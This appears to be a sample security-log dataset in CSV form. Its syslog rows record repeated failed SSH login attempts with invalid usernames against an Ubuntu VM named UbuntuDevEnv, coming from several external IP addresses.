+712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:53,UbuntuDevEnv,2019-06-26 18:01:53,auth,UbuntuDevEnv,info,Invalid user testmail from 54.37.66.73 port 41627,57826,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testmail,54.37.66.7,41627,,
+713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:53,UbuntuDevEnv,2019-06-26 18:01:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,57826,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:53,UbuntuDevEnv,2019-06-26 18:01:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57826,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:55,UbuntuDevEnv,2019-06-26 18:01:54,auth,UbuntuDevEnv,info,Failed password for invalid user testmail from 54.37.66.73 port 41627 ssh2,57826,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testmail,54.37.66.7,41627,,
+716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:55,UbuntuDevEnv,2019-06-26 18:01:54,auth,UbuntuDevEnv,info,Disconnected from invalid user testmail 54.37.66.73 port 41627 [preauth],57826,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testmail,54.37.66.7,41627,,
+717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:01:55,UbuntuDevEnv,2019-06-26 18:01:54,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 41627:11: Bye Bye [preauth],57826,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,41627,,
+718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:02:26,UbuntuDevEnv,2019-06-26 18:02:25,auth,UbuntuDevEnv,info,Invalid user ga from 58.87.109.107 port 28517,57936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ga,58.87.109.1,28517,,
+719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:02:26,UbuntuDevEnv,2019-06-26 18:02:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,57936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:02:26,UbuntuDevEnv,2019-06-26 18:02:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,57936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:02:27,UbuntuDevEnv,2019-06-26 18:02:27,auth,UbuntuDevEnv,info,Failed password for invalid user ga from 58.87.109.107 port 28517 ssh2,57936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ga,58.87.109.1,28517,,
+722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:02:28,UbuntuDevEnv,2019-06-26 18:02:27,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 28517:11: Bye Bye [preauth],57936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,28517,,
+723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:02:28,UbuntuDevEnv,2019-06-26 18:02:27,auth,UbuntuDevEnv,info,Disconnected from invalid user ga 58.87.109.107 port 28517 [preauth],57936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ga,58.87.109.1,28517,,
+724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:00,UbuntuDevEnv,2019-06-26 18:02:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,58054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:00,UbuntuDevEnv,2019-06-26 18:02:59,auth,UbuntuDevEnv,info,Invalid user andes from 157.230.190.1 port 52452,58054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andes,157.230.190.1,52452,,
+726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:00,UbuntuDevEnv,2019-06-26 18:02:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:01,UbuntuDevEnv,2019-06-26 18:03:01,auth,UbuntuDevEnv,info,Failed password for invalid user andes from 157.230.190.1 port 52452 ssh2,58054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andes,157.230.190.1,52452,,
+728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:02,UbuntuDevEnv,2019-06-26 18:03:01,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 52452:11: Bye Bye [preauth],58054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,52452,,
+729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:02,UbuntuDevEnv,2019-06-26 18:03:01,auth,UbuntuDevEnv,info,Disconnected from invalid user andes 157.230.190.1 port 52452 [preauth],58054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,andes,157.230.190.1,52452,,
+730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:18,UbuntuDevEnv,2019-06-26 18:03:18,auth,UbuntuDevEnv,info,Invalid user ts from 107.175.127.237 port 42638,58119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,107.175.127.2,42638,,
+731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:18,UbuntuDevEnv,2019-06-26 18:03:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:18,UbuntuDevEnv,2019-06-26 18:03:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,58119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:20,UbuntuDevEnv,2019-06-26 18:03:20,auth,UbuntuDevEnv,info,Failed password for invalid user ts from 107.175.127.237 port 42638 ssh2,58119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,107.175.127.2,42638,,
+734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:21,UbuntuDevEnv,2019-06-26 18:03:20,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 42638:11: Bye Bye [preauth],58119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,42638,,
+735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:21,UbuntuDevEnv,2019-06-26 18:03:20,auth,UbuntuDevEnv,info,Disconnected from invalid user ts 107.175.127.237 port 42638 [preauth],58119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,107.175.127.2,42638,,
+736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:23,UbuntuDevEnv,2019-06-26 18:03:23,auth,UbuntuDevEnv,info,Invalid user hang from 54.37.66.73 port 50225,58150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hang,54.37.66.7,50225,,
+737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:23,UbuntuDevEnv,2019-06-26 18:03:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:23,UbuntuDevEnv,2019-06-26 18:03:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,58150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:25,UbuntuDevEnv,2019-06-26 18:03:25,auth,UbuntuDevEnv,info,Failed password for invalid user hang from 54.37.66.73 port 50225 ssh2,58150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hang,54.37.66.7,50225,,
+740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:25,UbuntuDevEnv,2019-06-26 18:03:25,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 50225:11: Bye Bye [preauth],58150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,50225,,
+741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:25,UbuntuDevEnv,2019-06-26 18:03:25,auth,UbuntuDevEnv,info,Disconnected from invalid user hang 54.37.66.73 port 50225 [preauth],58150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hang,54.37.66.7,50225,,
+742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:46,UbuntuDevEnv,2019-06-26 18:03:45,auth,UbuntuDevEnv,info,Invalid user rushi from 58.87.109.107 port 43971,58226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rushi,58.87.109.1,43971,,
+743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:46,UbuntuDevEnv,2019-06-26 18:03:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:46,UbuntuDevEnv,2019-06-26 18:03:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,58226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:48,UbuntuDevEnv,2019-06-26 18:03:48,auth,UbuntuDevEnv,info,Failed password for invalid user rushi from 58.87.109.107 port 43971 ssh2,58226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rushi,58.87.109.1,43971,,
+746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:48,UbuntuDevEnv,2019-06-26 18:03:48,auth,UbuntuDevEnv,info,Disconnected from invalid user rushi 58.87.109.107 port 43971 [preauth],58226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rushi,58.87.109.1,43971,,
+747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:03:48,UbuntuDevEnv,2019-06-26 18:03:48,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 43971:11: Bye Bye [preauth],58226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,43971,,
+748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:23,UbuntuDevEnv,2019-06-26 18:04:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=148.70.115.149  user=test,58359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,148.70.115.1,,0,
+749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:25,UbuntuDevEnv,2019-06-26 18:04:25,auth,UbuntuDevEnv,info,Failed password for test from 148.70.115.149 port 32770 ssh2,58359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,148.70.115.1,32770,,
+750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:26,UbuntuDevEnv,2019-06-26 18:04:25,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 148.70.115.149 port 32770 [preauth],58359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,148.70.115.1,32770,,
+751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:26,UbuntuDevEnv,2019-06-26 18:04:25,auth,UbuntuDevEnv,info,Received disconnect from 148.70.115.149 port 32770:11: Bye Bye [preauth],58359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,148.70.115.1,32770,,
+752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:48,UbuntuDevEnv,2019-06-26 18:04:47,auth,UbuntuDevEnv,info,Invalid user jzapata from 157.230.190.1 port 40788,58450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jzapata,157.230.190.1,40788,,
+753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:48,UbuntuDevEnv,2019-06-26 18:04:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,58450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:48,UbuntuDevEnv,2019-06-26 18:04:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:50,UbuntuDevEnv,2019-06-26 18:04:49,auth,UbuntuDevEnv,info,Failed password for invalid user jzapata from 157.230.190.1 port 40788 ssh2,58450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jzapata,157.230.190.1,40788,,
+756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:50,UbuntuDevEnv,2019-06-26 18:04:49,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 40788:11: Bye Bye [preauth],58450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,40788,,
+757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:50,UbuntuDevEnv,2019-06-26 18:04:49,auth,UbuntuDevEnv,info,Disconnected from invalid user jzapata 157.230.190.1 port 40788 [preauth],58450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jzapata,157.230.190.1,40788,,
+758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:54,UbuntuDevEnv,2019-06-26 18:04:54,auth,UbuntuDevEnv,info,Invalid user cyril from 54.37.66.73 port 58831,58475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyril,54.37.66.7,58831,,
+759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:54,UbuntuDevEnv,2019-06-26 18:04:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:54,UbuntuDevEnv,2019-06-26 18:04:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,58475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:56,UbuntuDevEnv,2019-06-26 18:04:56,auth,UbuntuDevEnv,info,Failed password for invalid user cyril from 54.37.66.73 port 58831 ssh2,58475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyril,54.37.66.7,58831,,
+762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:56,UbuntuDevEnv,2019-06-26 18:04:56,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 58831:11: Bye Bye [preauth],58475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,58831,,
+763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:04:56,UbuntuDevEnv,2019-06-26 18:04:56,auth,UbuntuDevEnv,info,Disconnected from invalid user cyril 54.37.66.73 port 58831 [preauth],58475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyril,54.37.66.7,58831,,
+764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:01,UbuntuDevEnv,2019-06-26 18:05:01,auth,UbuntuDevEnv,info,Invalid user ubuntu from 185.234.73.130 port 57712,58500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,185.234.73.1,57712,,
+765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:01,UbuntuDevEnv,2019-06-26 18:05:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:01,UbuntuDevEnv,2019-06-26 18:05:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.234.73.130,58500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.234.73.1,,0,
+767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:03,UbuntuDevEnv,2019-06-26 18:05:03,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 185.234.73.130 port 57712 ssh2,58500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,185.234.73.1,57712,,
+768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:03,UbuntuDevEnv,2019-06-26 18:05:03,auth,UbuntuDevEnv,info,"Received disconnect from 185.234.73.130 port 57712:11: Normal Shutdown, Thank you for playing [preauth]",58500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.234.73.1,57712,,
+769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:03,UbuntuDevEnv,2019-06-26 18:05:03,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 185.234.73.130 port 57712 [preauth],58500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,185.234.73.1,57712,,
+770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:08,UbuntuDevEnv,2019-06-26 18:05:08,auth,UbuntuDevEnv,info,Invalid user abdul from 58.87.109.107 port 59791,58534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abdul,58.87.109.1,59791,,
+771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:05:08,UbuntuDevEnv,2019-06-26 18:05:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
